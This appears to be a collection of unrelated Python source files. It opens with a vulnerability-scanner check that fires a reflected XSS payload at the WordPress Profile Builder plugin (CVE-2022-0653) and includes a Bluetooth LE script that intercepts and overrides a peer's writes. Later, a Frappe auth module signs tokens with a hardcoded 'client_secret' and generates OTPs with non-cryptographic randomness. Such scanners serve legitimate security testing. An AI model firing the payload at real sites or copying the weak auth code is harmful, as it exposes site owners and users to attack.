"https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653",
"https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "CVE-2022-0653",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2022", "wordpress", "xss", "wp-plugin"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = '/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404'
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and '<a href="javascript:alert(document.domain);">here</a>' in resp.text and "text/html" in str(resp.headers):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
457099
|
from blesuite.connection_manager import BLEConnectionManager
from blesuite.event_handler import ATTEventHook
from blesuite.entities.gatt_device import BLEDevice
from blesuite.entities.permissions import Permissions
import blesuite.utils.att_utils as att_utils
from scapy.layers.bluetooth import ATT_Read_Request, ATT_Read_Response, ATT_Error_Response
import gevent
import logging
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger(__name__)
adapter = 0
role = 'peripheral'
class MyCustomATTEventHandler(ATTEventHook):
# override
def att_write_hook(self, gatt_handle, data):
write_value_to_attribute = True
log.debug("ATT write hook triggered. Write value to attribute: %s value: %s" % (hex(gatt_handle), data))
print "Received value:", data
# replace data peer is attempting to write with string below
data = "Intercepted write value"
print "New write value is:", data
return (write_value_to_attribute, gatt_handle, data)
# Only enable one of these hooks at a time, otherwise the functionality will clash and prevent you from
# seeing the effects of both.
'''
def att_response_hook(self, received_packet, our_response_packet):
send_packet = True
log.debug("ATT response hook triggered. Received packet: %s Send packet: %s packet: %s" % (received_packet, send_packet, our_response_packet))
# If we receive an ATT Write Request and that results in some error, instead of sending the error packet,
# send a valid ATT Write Response to trick the peer device.
if ATT_Read_Request in received_packet and ATT_Error_Response in our_response_packet:
our_response_packet = ATT_Read_Response("Intercepted!")
return (send_packet, our_response_packet)
'''
# initialize event handler
event_handler = MyCustomATTEventHandler()
with BLEConnectionManager(adapter, role, att_operation_event_hook=event_handler) as connection_manager:
# Generate BLEDevice
ble_device = BLEDevice()
# Add Services and Characteristics to BLEDevice
service1 = ble_device.add_service(0x01, 0x06, "2124")
characteristic1 = service1.add_characteristic(0x03, 0x02, "2124",
Permissions.READ | Permissions.WRITE,
"testValue1",
characteristic_value_attribute_read_permission=att_utils.ATT_SECURITY_MODE_NO_ACCESS,
characteristic_value_attribute_write_permission=att_utils.ATT_SECURITY_MODE_OPEN
)
characteristic1.add_user_description_descriptor(0x04,
"Characteristic 1")
# Generate GATT server on host using BLEDevice information.
# 2nd param (True) tells the GATT import process to use attribute handles specified in the BLEDevice rather
# than sequentially assigning them as attributes are added to the server
connection_manager.initialize_gatt_server_from_ble_device(ble_device, True)
# Retrieve GATT server
gatt_server = connection_manager.get_gatt_server()
# Print GATT server for demonstration purposes
gatt_server.debug_print_db()
# alternate method: set event handler
connection_manager.set_att_operation_hook(event_handler)
# begin advertising
connection_manager.start_advertising()
# continually run server without blocking packet processing
while True:
gevent.sleep(1)
|
457104
|
import numpy as np
import matplotlib.pyplot as plt
import afterglowpy as grb
Z = {'jetType': grb.jet.TopHat, # Top-Hat jet
'specType': 0, # Basic Synchrotron Emission Spectrum
'thetaObs': 0.05, # Viewing angle in radians
'E0': 1.0e53, # Isotropic-equivalent energy in erg
'thetaCore': 0.1, # Half-opening angle in radians
'n0': 1.0, # circumburst density in cm^{-3}
'p': 2.2, # electron energy distribution index
'epsilon_e': 0.1, # epsilon_e
'epsilon_B': 0.01, # epsilon_B
'xi_N': 1.0, # Fraction of electrons accelerated
'd_L': 1.0e28, # Luminosity distance in cm
'z': 0.55} # redshift
nua = 1.0e0 # Low Frequencies in Hz
nub = 1.0e20 # High Frequencies in Hz
t = 1.0 * grb.day2sec # spectrum at 1 day
nu = np.geomspace(nua, nub, num=100)
print("Calculating")
Fnu = grb.fluxDensity(t, nu, **Z)
print("Writing spec.txt")
with open("spec.txt", 'w') as f:
f.write("# t " + str(t) + ' (s)\n')
f.write("# nu(Hz) Fnu(mJy)\n")
for i in range(len(nu)):
f.write("{0:.6e} {1:.6e}\n".format(nu[i], Fnu[i]))
print("Plotting")
fig, ax = plt.subplots(1, 1)
ax.plot(nu, Fnu)
ax.set_xscale('log')
ax.set_yscale('log')
ax.set_xlabel(r'$\nu$ (Hz)')
ax.set_ylabel(r'$F_\nu$[1 day] (mJy)')
fig.tight_layout()
print("Saving figure spec.png")
fig.savefig("spec.png")
plt.close(fig)
|
457113
|
import FWCore.ParameterSet.Config as cms
# Set the HLT paths
import HLTrigger.HLTfilters.hltHighLevel_cfi
ALCARECOSiStripCalMinBiasAAGHLT = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone(
andOr = True, ## choose logical OR between Triggerbits
## HLTPaths = [
## #Minimum Bias
## "HLT_MinBias*"
## ],
# We want to change this key to SiStripCalMinBiasAAGHI --> update triggerbits first
eventSetupPathsKey = 'SiStripCalMinBiasAAGHI',
throw = False # tolerate triggers stated above, but not available
)
# Select only events where tracker had HV on (according to DCS bit information)
# AND respective partition is in the run (according to FED information)
import CalibTracker.SiStripCommon.SiStripDCSFilter_cfi
DCSStatusForSiStripCalMinBiasAAG = CalibTracker.SiStripCommon.SiStripDCSFilter_cfi.siStripDCSFilter.clone()
# Select pp-like events based on the pixel cluster multiplicity
#import HLTrigger.special.hltPixelActivityFilter_cfi
#HLTPixelActivityFilterForSiStripCalMinBias = HLTrigger.special.hltPixelActivityFilter_cfi.hltPixelActivityFilter.clone()
#HLTPixelActivityFilterForSiStripCalMinBias.maxClusters = 500
#HLTPixelActivityFilterForSiStripCalMinBias.inputTag = 'siPixelClusters'
# Select only good tracks
import Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi
ALCARECOSiStripCalMinBiasAAG = Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi.AlignmentTrackSelector.clone()
ALCARECOSiStripCalMinBiasAAG.filter = True ##do not store empty events
ALCARECOSiStripCalMinBiasAAG.src = 'hiGeneralTracks'
ALCARECOSiStripCalMinBiasAAG.applyBasicCuts = True
ALCARECOSiStripCalMinBiasAAG.ptMin = 0.8 ##GeV
ALCARECOSiStripCalMinBiasAAG.nHitMin = 6 ## at least 6 hits required
ALCARECOSiStripCalMinBiasAAG.chi2nMax = 10.
ALCARECOSiStripCalMinBiasAAG.GlobalSelector.applyIsolationtest = False
ALCARECOSiStripCalMinBiasAAG.GlobalSelector.applyGlobalMuonFilter = False
ALCARECOSiStripCalMinBiasAAG.GlobalSelector.applyJetCountFilter = False
ALCARECOSiStripCalMinBiasAAG.TwoBodyDecaySelector.applyMassrangeFilter = False
ALCARECOSiStripCalMinBiasAAG.TwoBodyDecaySelector.applyChargeFilter = False
ALCARECOSiStripCalMinBiasAAG.TwoBodyDecaySelector.applyAcoplanarityFilter = False
ALCARECOSiStripCalMinBiasAAG.TwoBodyDecaySelector.applyMissingETFilter = False
# Sequence with the filter for the Pixel activity #
#seqALCARECOSiStripCalMinBias = cms.Sequence(ALCARECOSiStripCalMinBiasHLT*HLTPixelActivityFilterForSiStripCalMinBias*DCSStatusForSiStripCalMinBias*ALCARECOSiStripCalMinBias)
seqALCARECOSiStripCalMinBiasAAG = cms.Sequence(ALCARECOSiStripCalMinBiasAAGHLT *
DCSStatusForSiStripCalMinBiasAAG *
ALCARECOSiStripCalMinBiasAAG)
|
457128
|
from setuptools import setup, find_packages
setup(
name='mkdocs-pdf-export-plugin',
version='0.5.10',
description='An MkDocs plugin to export content pages as PDF files',
long_description='The pdf-export plugin will export all markdown pages in your MkDocs repository as PDF files'
'using WeasyPrint. The exported documents support many advanced features missing in most other'
'PDF exports, such as a PDF Index and support for CSS paged media module.',
keywords='mkdocs pdf export weasyprint',
url='https://github.com/zhaoterryy/mkdocs-pdf-export-plugin/',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
python_requires='>=3.5',
install_requires=[
'mkdocs>=0.17',
'weasyprint>=0.44',
'beautifulsoup4>=4.6.3'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7'
],
packages=find_packages(),
entry_points={
'mkdocs.plugins': [
'pdf-export = mkdocs_pdf_export_plugin.plugin:PdfExportPlugin'
]
}
)
|
457143
|
import random
from six import string_types
import frappe
import jwt
from frappe import _
from frappe.auth import LoginManager
from frappe.utils import cint, get_url, get_datetime
from frappe.utils.password import check_password, passlibctx, update_password
from renovation_core.utils import update_http_response
from .sms_setting import send_sms
@frappe.whitelist(allow_guest=True)
def generate_otp(medium="sms", medium_id=None, sms_hash=None, purpose="login", lang="en"):
"""
Generate and Send an OTP through the medium specified. we generate new pin on each call, ignoring previous pins
3 variables available to render in template:
- otp
- mobile_no (if sms)
- email (if email)
- user (the User object)
:param medium: 'email' or 'sms'
:param medium_id: The actual email/mobile_no
:param sms_hash: The hash that should be appended to OTP SMS
:param purpose: Specify an optional purpose (login, pwd_reset) to make a custom context
:param lang: Language of the OTP message (SMS or Email)
"""
if medium not in ("sms", "email"):
frappe.throw("medium can only be 'sms' or 'email'")
if not medium_id:
frappe.throw(f"medium_id is mandatory")
user = get_linked_user(id_type=medium, id=medium_id)
if user:
lang = frappe.db.get_value("User", user, "language")
frappe.local.lang = lang
# generate a pin
otp = frappe.safe_decode(str(get_otp()))
# saving the hashed pin, not the pin as is
hashed_pin = passlibctx.hash(otp)
expires_in_sec = (cint(frappe.db.get_value(
"System Settings", None, "verification_otp_validity")) or 15) * 60
frappe.cache().set_value(
get_otp_redis_key(
medium, medium_id,
purpose),
hashed_pin,
expires_in_sec=expires_in_sec
)
status = "success"
if medium == "sms":
sms_otp_template = frappe.db.get_value(
"System Settings", None, "sms_otp_template")
if not sms_otp_template:
frappe.throw("Please set SMS OTP Template in System Settings")
sms_otp_template = frappe.get_doc("SMS Template", sms_otp_template)
render_params = frappe._dict(
otp=otp,
mobile_no=medium_id,
user=frappe.get_doc("User", user) if user else frappe._dict()
)
msg = frappe.render_template(
sms_otp_template.template, render_params)
if sms_hash:
msg = msg + u"\n" + sms_hash
sms = send_sms([medium_id], msg, success_msg=False)
status = "fail"
# Since SMS Settings might remove or add '+' character, we will check against the last 5 digits
if sms and isinstance(sms, list) and len(sms) == 1 and (medium_id[-5:] in sms[0] if isinstance(sms[0], string_types) else medium_id[-5:] in sms[0].sent_to):
status = "success"
elif medium == "email":
email_otp_template = frappe.db.get_value(
"System Settings", None, "email_otp_template")
if not email_otp_template:
frappe.throw("Please set Email OTP Template in System Settings")
email_otp_template = frappe.get_doc("Email Template", email_otp_template)
render_params = frappe._dict(
otp=otp,
email=medium_id,
user=frappe.get_doc("User", user) if user else frappe._dict()
)
status = "fail"
try:
frappe.sendmail(
recipients=[medium_id],
delayed=False,
subject=frappe.render_template(
email_otp_template.subject, render_params),
message=frappe.render_template(
email_otp_template.response, render_params)
)
status = "success"
except frappe.OutgoingEmailError:
status = "fail"
return frappe._dict({"status": status, medium: medium_id})
def generate_otp_deprecated():
medium = frappe.local.form_dict.medium or "sms"
mobile = frappe.local.form_dict.mobile
email = frappe.local.form_dict.email
sms_hash = frappe.local.form_dict.hash
update_http_response(generate_otp(medium, mobile or email, sms_hash))
@frappe.whitelist(allow_guest=True)
def verify_otp(medium="sms", medium_id=None, otp=None, login_to_user=False, purpose="login"):
"""
Verify the OTP against the previously generated OTP.
:param medium: 'email' or 'sms'
:param medium_id: The actual email/mobile_no
:param otp: User input
:param login_to_user: Check this flag to login to the associated user
:param purpose: If purpose was specified while calling generate_otp, it is mandatory to use the same here
"""
if medium not in ("sms", "email"):
frappe.throw("medium can only be 'sms' or 'email'")
if not medium_id:
frappe.throw(f"medium_id is mandatory")
def http_response(out):
r = frappe._dict(status=out, medium=medium_id)
return r
user = None
if login_to_user:
user = get_linked_user(id_type=medium, id=medium_id)
if not user:
return http_response("no_linked_user")
redis_key = get_otp_redis_key(medium, medium_id, purpose)
hashed_otp = frappe.safe_decode(
frappe.cache().get_value(redis_key, expires=True))
if not hashed_otp:
return http_response("no_otp_for_mobile")
if not passlibctx.verify(otp, hashed_otp):
return http_response("invalid_otp")
if login_to_user == 1:
l = LoginManager()
l.login_as(user)
l.resume = False
l.run_trigger('on_session_creation')
return http_response("verified")
def verify_otp_deprecated():
medium = frappe.local.form_dict.medium or "sms"
mobile = frappe.local.form_dict.mobile
email = frappe.local.form_dict.email
pin = frappe.local.form_dict.pin
login = cint(frappe.local.form_dict.loginToUser or "0")
r = verify_otp(medium=medium, medium_id=mobile or email,
otp=pin, login_to_user=login)
# Response Compatibility
if r.status == "no__for_mobile":
r.status = "no_pin_for_mobile"
elif r.status == "invalid_otp":
r.status = "invalid_pin"
update_http_response(r)
def get_otp_redis_key(medium, medium_id, purpose):
return f"{purpose}_{medium}:{medium_id}"
def get_linked_user(id_type, id):
"""
Returns the user associated with the details
:param id_type: either 'mobile' or 'email'
:param id: the email/mobile
"""
if id_type not in ("mobile", "sms", "email"):
frappe.throw(f"Invalid id_type: {id_type}")
if id_type in ("mobile", "sms"):
id_type = "mobile_no"
return frappe.db.get_value("User", {id_type: id})
def get_otp(length=6):
return random.sample(range(int('1' + '0' * (length - 1)), int('9' * length)), 1)[0]
@frappe.whitelist(allow_guest=True)
def pin_login(user, pin, device=None):
"""
Login using the user's email and the quick login pin
:param user: The active user
:param pin: The quick login pin
:param device: Clear all sessions of device
"""
from frappe.sessions import clear_sessions
login = LoginManager()
if not frappe.cache().get_value(f'can_use_quick_login_pin', user=user, expires=True):
login.fail('Quick Login PIN time expired', user=user)
login.check_if_enabled(user)
if not check_password(user, pin, doctype='User', fieldname='quick_login_pin'):
login.fail('Incorrect password', user=user)
login.login_as(user)
login.resume = False
login.run_trigger('on_session_creation')
if device:
clear_sessions(user, True, device)
return frappe.session.user
@frappe.whitelist(allow_guest=True)
def get_token(user, pwd, expires_in=3600, expire_on=None, device=None):
"""
Get the JWT Token
:param user: The user in ctx
:param pwd: <PASSWORD>
:param expires_in: number of seconds till expiry
:param expire_on: yyyy-mm-dd HH:mm:ss to specify the expiry (deprecated)
:param device: The device in ctx
"""
if not frappe.db.exists("User", user):
raise frappe.ValidationError(_("Invalide User"))
from frappe.sessions import clear_sessions
login = LoginManager()
login.check_if_enabled(user)
if not check_password(user, pwd):
login.fail('Incorrect password', user=user)
login.login_as(user)
login.resume = False
login.run_trigger('on_session_creation')
_expires_in = 3600
if cint(expires_in):
_expires_in = cint(expires_in)
elif expire_on:
_expires_in = (get_datetime(expire_on) - get_datetime()).total_seconds()
token = get_bearer_token(
user=user,
expires_in=_expires_in
)
frappe.local.response["token"] = token["access_token"]
frappe.local.response.update(token)
def get_oath_client():
client = frappe.db.get_value("OAuth Client", {})
if not client:
# Make one auto
client = frappe.get_doc(frappe._dict(
doctype="OAuth Client",
app_name="default",
scopes="all openid",
redirect_urls=get_url(),
default_redirect_uri=get_url(),
grant_type="Implicit",
response_type="Token"
))
client.insert(ignore_permissions=True)
else:
client = frappe.get_doc("OAuth Client", client)
return client
def get_bearer_token(user, expires_in=3600):
import hashlib
import jwt
import frappe.oauth
from oauthlib.oauth2.rfc6749.tokens import random_token_generator, OAuth2Token
client = get_oath_client()
token = frappe._dict({
'access_token': random_token_generator(None),
'expires_in': expires_in,
'token_type': 'Bearer',
'scopes': client.scopes,
'refresh_token': random_token_generator(None)
})
bearer_token = frappe.new_doc("OAuth Bearer Token")
bearer_token.client = client.name
bearer_token.scopes = token['scopes']
bearer_token.access_token = token['access_token']
bearer_token.refresh_token = token.get('refresh_token')
bearer_token.expires_in = token['expires_in'] or 3600
bearer_token.user = user
bearer_token.save(ignore_permissions=True)
frappe.db.commit()
# ID Token
id_token_header = {
"typ": "jwt",
"alg": "HS256"
}
id_token = {
"aud": "token_client",
"exp": int((frappe.db.get_value("OAuth Bearer Token", token.access_token, "expiration_time") - frappe.utils.datetime.datetime(1970, 1, 1)).total_seconds()),
"sub": frappe.db.get_value("User Social Login", {"parent": bearer_token.user, "provider": "frappe"}, "userid"),
"iss": "frappe_server_url",
"at_hash": frappe.oauth.calculate_at_hash(token.access_token, hashlib.sha256)
}
id_token_encoded = jwt.encode(
id_token, "client_secret", algorithm='HS256', headers=id_token_header)
id_token_encoded = frappe.safe_decode(id_token_encoded)
token.id_token = id_token_encoded
frappe.flags.jwt = id_token_encoded
return token
@frappe.whitelist()
def get_jwt_token():
"""
Get jwt token for the active user
"""
return get_bearer_token(
user=frappe.session.user, expires_in=86400
)["access_token"]
@frappe.whitelist()
def change_password(old_password, new_password):
"""
Update the password when old password is given
:param old_password: The old password of the User
:param new_password: The new password to set for the user
"""
from frappe.core.doctype.user.user import test_password_strength, handle_password_test_fail
check_password(user=frappe.session.user, pwd=<PASSWORD>)
user = frappe.get_doc("User", frappe.session.user)
user_data = (user.first_name, user.middle_name,
user.last_name, user.email, user.birth_date)
result = test_password_strength(new_password, '', None, user_data)
feedback = result.get("feedback", None)
if feedback and not feedback.get('password_policy_validation_passed', False):
handle_password_test_fail(result)
update_password(user.name, new_password)
return True
|
457161
|
import idc
import ida_enum
from bip.py3compat.py3compat import *
from .bipelt import BipRefElt
class BipEnum(object):
"""
Class for representing and manipulating an enum in IDA.
Class method :meth:`~BipEnum.get` and :meth:`~BipEnum.create` allows
to easily create and recuperate a :class:`BipEnum` object.
The enum in IDA do not support xref, however the enum members do.
.. todo:: allow to set an instruction operand as an enum
"""
########################## BASE ##########################
def __init__(self, eid):
"""
Constructor for a :class:`BipEnum` object. There is few reason
to directly use this constructor, see functions:
:meth:`~BipEnum.get` or :meth:`~BipEnum.create`
:param int eid: The enum id (``enum_t``) representing this enum.
"""
self._eid = eid
def __eq__(self, other):
"""
Compare two BipEnum.
"""
if isinstance(other, BipEnum):
return self._eid == other._eid
elif isinstance(other, (int, long)):
return self._eid == other
else:
return NotImplemented
def __ne__(self, other):
res = self.__eq__(other)
if res == NotImplemented:
return res
else:
return not res
@classmethod
def _is_this_elt(cls, idelt):
"""
Return true if ``idelt`` correspond to an enum_t.
"""
return ida_enum.get_enum_name(idelt) is not None
@property
def name(self):
"""
Property for getting the name of this enum. A setter exist for
this property.
:return str: The name of this enum.
"""
return ida_enum.get_enum_name(self._eid)
@name.setter
def name(self, value):
"""
Setter for setting the name of this enum.
:param str value: The new name to set for the enum.
:raise ValueError: If setting the name failed.
"""
if not ida_enum.set_enum_name(self._eid, value):
raise ValueError("Impossible to set new name {} for the enum".format(value))
@property
def width(self):
"""
Property for getting the width in bytes of an enum. The width of
an enum can be: 0 (unspecified),1,2,4,8,16,32,64.
:return int: The width of the enum.
"""
return ida_enum.get_enum_width(self._eid)
@width.setter
def width(self, value):
"""
Setter for the width of an enum. The width in bytes of an enum
can be: 0 (unspecified),1,2,4,8,16,32,64.
:param int value: The width of the enum.
:raise ValueError: If the value is not supported.
:raise RuntimeError: If it was unable to change the width of an
enum.
"""
if value not in (0,1,2,4,8,16,32,64):
raise ValueError("Unsuported width {} for enum".format(value))
if not ida_enum.set_enum_width(self._eid, value):
raise RuntimeError("Unable to change width of the enum")
@property
def is_bitfield(self):
"""
Property for getting or setting if an enum is a bitfield.
:return bool: True if this enum is a bitfield, false otherwise.
"""
return ida_enum.is_bf(self._eid)
@is_bitfield.setter
def is_bitfield(self, value):
"""
Setter for setting an enum has being a bitfield.
:param bool value: True for setting this enum has a bitfield,
False for setting it has not a bitfield.
:raise RuntimeError: If unable to change the enum.
"""
if not ida_enum.set_enum_bf(self._eid, value):
raise RuntimeError("Unable to change the enum bitfield characteristic")
def __str__(self):
return "Enum: {}".format(self.name)
@property
def comment(self):
"""
Property which return the comment associated with an enum.
:return: The comment as a string or None if no comment is
associated with it.
"""
return ida_enum.get_enum_cmt(self._eid, False)
@comment.setter
def comment(self, value):
"""
Property setter for changing the enum comment.
:param str value: The new comment to set.
"""
ida_enum.set_enum_cmt(self._eid, value, False)
@property
def rcomment(self):
"""
Property which return the repeatable comment associated with an
enum.
:return: The comment as a string or None if no comment is
associated with it.
"""
return ida_enum.get_enum_cmt(self._eid, True)
@rcomment.setter
def rcomment(self, value):
"""
Property setter for changing the enum repeatable comment.
:param str value: The new comment to set.
"""
ida_enum.set_enum_cmt(self._eid, value, True)
############################### MEMBERS ###############################
@property
def nb_members(self):
"""
Property which return the number of members present in this enum.
"""
return ida_enum.get_enum_size(self._eid)
def add(self, name, value):
"""
Property for adding a new member to this enum.
:param str name: The name of the new member to add.
:param int value: The value of the new member to add.
:raise RuntimeError: If it was not possible to add the new member.
"""
if ida_enum.add_enum_member(self._eid, name, value, ida_enum.DEFMASK) != 0:
raise RuntimeError("Unable to add new member {} ({}) to enum {}".format(name, value, self.name))
def member_by_name(self, name):
"""
Function for getting a member of this enum from its name.
Internally this function use :meth:`BEnumMember.get` and check
that the parent of the member is indeed this enum.
:param str name: The name of the member to get.
:return: A :class`BEnumMember` object.
:raise ValueError: If the name for the enum member does not exist
or if the enum member is not part of this enum.
"""
bem = BEnumMember.get(name) # this will raise a ValueError if name does not exist
if bem.enum != self: # check that we are in the good enum
raise ValueError("Enum member {} exist but not in enum {}".format(name, self.name))
return bem
def __getitem__(self, key):
"""
Getitem method which allow access to the members of the enum from
their name.
This is just a convinient wrapper on top
of :meth:`~BipEnum.member_by_name`.
:param str key: The name of the member to get.
:return: A :class`BEnumMember` object.
:raise ValueError: If the name for the enum member does not exist
or if the enum member is not part of this enum.
"""
return self.member_by_name(key)
def members_by_value(self, value, _bmask=None):
"""
Function for getting members with a particular value in this enum.
:param int value: The value for which to get the members.
:param int _bmask: Optionnal value for precising the mask, by
default use the default mask.
:return: A list of :class:`BEnumMember` representing the enum
member with that value
"""
if _bmask is None:
_bmask = ida_enum.DEFMASK
tmp = ida_enum.get_first_serial_enum_member(self._eid, value, _bmask)
# tmp is a list with the first element being the member id and the
# second a serial ?
mid = tmp[0]
fmid = mid
ser = tmp[1]
midl = []
while mid != idc.BADADDR:
midl.append(mid)
tmp = ida_enum.get_next_serial_enum_member(ser, fmid)
mid = tmp[0]
ser = tmp[1]
return [BEnumMember(m) for m in midl]
def del_member(self, name):
"""
Function for deleting a member from this enum by its name.
Internally this will first get the enum using
:meth:`~BipEnum.member_by_name` then try to delete it.
:param str name: The name of the member to delete.
:raise ValueError: If the name does not exist.
:raise RuntimeError: If was not able to delete the enum member.
"""
bem = self.member_by_name(name)
if not ida_enum.del_enum_member(self._eid, bem.value, bem._serial, bem._bmask):
raise RuntimeError("Unable to delete enum member {} from {}".format(name, self.name))
@property
def members(self):
"""
Property for getting a list of the members of this enum.
:return: A list of :class:`BEnumMember`.
"""
mml = []
# only way to iterate on members is to use a visitor, thx IDA
class _BipEnumVisitIterator(ida_enum.enum_member_visitor_t):
def visit_enum_member(self, cid, val):
mml.append(BEnumMember(cid))
return 0
ida_enum.for_all_enum_members(self._eid, _BipEnumVisitIterator())
return mml
def __iter__(self):
"""
Iter method for allowing to iterate on all members of the enum.
This is just a wrapper on :meth:`BipEnum.members`. Update to the
enum during the iteration will not be taken into account.
"""
for m in self.members:
yield m
########################### GET & CREATE ENUM ########################
@classmethod
def get(cls, name):
"""
Class method for getting a :class:`BipEnum` object from the name
of an existing enum.
:param str name: The name of the enum to get.
:raise ValueError: If the enum ``name`` does not exist.
:return: A :class:`BipEnum` object corresponding to the enum
identified by the name provided.
"""
eid = ida_enum.get_enum(name)
if eid == idc.BADADDR:
raise ValueError("Enum {} does not exist".format(name))
return cls(eid)
@classmethod
def create(cls, name):
"""
Class method allowing to create a new empty enum.
:param str name: The name of the enum to create. If this is
``None`` a default name ``enum_INT`` will be created by IDA.
:raise ValueError: If the enum ``name`` already exist.
:raise RuntimeError: If it was not possible to create the enum.
:return: A :class:`BipEnum` object corresponding to the newly
created enum.
"""
eid = ida_enum.get_enum(name)
if eid != idc.BADADDR:
raise ValueError("Enum {} already exist".format(name))
eid = ida_enum.add_enum(idc.BADADDR, name, 0)
if eid == idc.BADADDR:
raise RuntimeError("Unable to create enum {}".format(name))
return cls(eid)
@staticmethod
def delete(arg):
"""
Static method allowing to delete an enum by its name or its id.
:parm arg: String representing the name of the enum or id (int)
representing the enum in IDA or a :class:`BipEnum` object (in
that case the object will not be valid after that).
:raise ValueError: If the argument is invalid.
"""
if isinstance(arg, (str, unicode)):
eid = ida_enum.get_enum(arg)
if eid == idc.BADADDR:
raise ValueError("Enum {} does not exist".format(arg))
elif isinstance(arg, (int, long)):
eid = arg
elif isinstance(arg, BipEnum):
eid = arg._eid
else:
raise ValueError("Invalid argument")
ida_enum.del_enum(eid)
class BEnumMember(BipRefElt):
"""
Class for representing and manipulating an enum member. Object
of this class can be access, created and delete through methods of
:class:`BipEnum`. It is possible to directly get an object of this
type using :meth:`BEnumMember.get`.
The object of this class support the xref API implemented in the
parent class :class:`BipRefElt`.
"""
############################# BASE ####################################
def __init__(self, member_id):
super(BEnumMember, self).__init__(member_id)
self._member_id = member_id
@classmethod
def _is_this_elt(cls, idelt):
"""
Return true if ``idelt`` correspond to a enum member id.
In practice this try to get the associated enum for this potential
enum id and check if it succeed or not.
"""
return ida_enum.get_enum_member_enum(idelt) != idc.BADADDR
@property
def _mid(self):
"""
Property which return the enum member id for this object.
Use for interfacing with IDAPython internals.
"""
return self._member_id
@property
def _serial(self):
"""
Property which return the "serial" of this enum member. This is
used only for interfacing with native IDAPython API.
The serial is not a unique id for this enum, the serials for enum
members always start at 0 and is incremented only when two enum
members have the same value.
:return: The serial integer for this enum member.
"""
return ida_enum.get_enum_member_serial(self._mid)
@property
def _bmask(self):
"""
Property for getting the bitmask of this enum member. This is used
only for interfacting with native IDAPython API. Do not know what
the bitmask is actual used for in IDA.
:return: An integer representing the bitmask for this member.
"""
return ida_enum.get_enum_member_bmask(self._mid)
def __eq__(self, other):
"""
Equality operator for two :class:`BEnumMember`.
"""
if isinstance(other, BEnumMember):
return self._mid == other._mid
elif isinstance(other, (int, long)):
return self._mid == other
else:
return NotImplemented
def __ne__(self, other):
return not self.__eq__(other)
@property
def value(self):
"""
Property for getting the value of this enum member.
:return int: The value of this enum member.
"""
return ida_enum.get_enum_member_value(self._mid)
@property
def name(self):
"""
Property for getting and setting the name of this enum member.
:return str: The name of this enum member.
"""
return ida_enum.get_enum_member_name(self._mid)
@name.setter
def name(self, value):
"""
Setter property for changing the name of an enum member.
:param str value: The new name for the enum member.
:raise RuntimeError: If was unable to change the name.
"""
if not ida_enum.set_enum_member_name(self._mid, value):
raise RuntimeError("Unable to set enum name to {}".format(value))
@property
def enum(self):
"""
Property for getting the :class:`BipEnum` object from this member.
:return: The :class:`BipEnum` associated with this member.
"""
return BipEnum(ida_enum.get_enum_member_enum(self._mid))
def __str__(self):
return "EnumMember: {}.{} ({})".format(self.enum.name, self.name, self.value)
@property
def comment(self):
"""
Property which return the comment associated with an enum member.
:return: The comment as a string or None if no comment is
associated with it.
"""
return ida_enum.get_enum_member_cmt(self._mid, False)
@comment.setter
def comment(self, value):
"""
Property setter for changing the enum member comment.
:param str value: The new comment to set.
"""
ida_enum.set_enum_member_cmt(self._mid, value, False)
@property
def rcomment(self):
"""
Property which return the repeatable comment associated with an
enum member.
:return: The comment as a string or None if no comment is
associated with it.
"""
return ida_enum.get_enum_member_cmt(self._mid, True)
@rcomment.setter
def rcomment(self, value):
"""
Property setter for changing the enum member repeatable comment.
:param str value: The new comment to set.
"""
ida_enum.set_enum_member_cmt(self._mid, value, True)
############################### GET #################################
@classmethod
def get(cls, name):
"""
Class method for recuperating a :class:`BEnumMember` object from
its name.
:return: A :class:`BEnumMember` object associated with the name.
:raise ValueError: If no enum member with this name exist.
"""
mid = ida_enum.get_enum_member_by_name(name)
if mid == idc.BADADDR:
raise ValueError("Enum member with name {} was not found".format(name))
return cls(mid)
|
457248
|
import sys
import subprocess
import re
from tabulate import tabulate
import textwrap
import warnings
import datetime as dt
import numpy as np
from scipy.interpolate import interp1d
from ._exceptions import InterfaceError, AdapterUnaccessibleError
from .utils import db2dbm, RealTimePlot, spin, rssi_to_colour_str
from ._base import show_header, term
OUT_OF_RANGE = (-300, -200)
VALUES_PER_FRAME = 50
LOADING_HANDLER = None
NAME_DICT = dict()
cells_re = re.compile(r'Cell \d+ - ')
quality_re_dict = {
'dBm': re.compile(
r'Quality[=:](?P<quality>\d+/\d+).*Signal level[=:](?P<siglevel>-\d+) dBm?(.*Noise level[=:](?P<noiselevel>-\d+) dBm)?'),
'relative': re.compile(r'Quality[=:](?P<quality>\d+/\d+).*Signal level[=:](?P<siglevel>\d+/\d+)'),
'absolute': re.compile(r'Quality[=:](?P<quality>\d+).*Signal level[=:](?P<siglevel>\d+)')
}
frequency_re = re.compile(r'^(?P<frequency>[\d\.]+ .Hz)(?:[\s\(]+Channel\s+(?P<channel>\d+)[\s\)]+)?$')
# Checks if wifi is off
network_down_re = re.compile(r'.*Network is down*.')
identity = lambda x: x
key_translations = {
'encryption key': 'encrypted',
'essid': 'ssid',
}
class Cell:
"""
Presents a Python interface to the output of iwlist.
"""
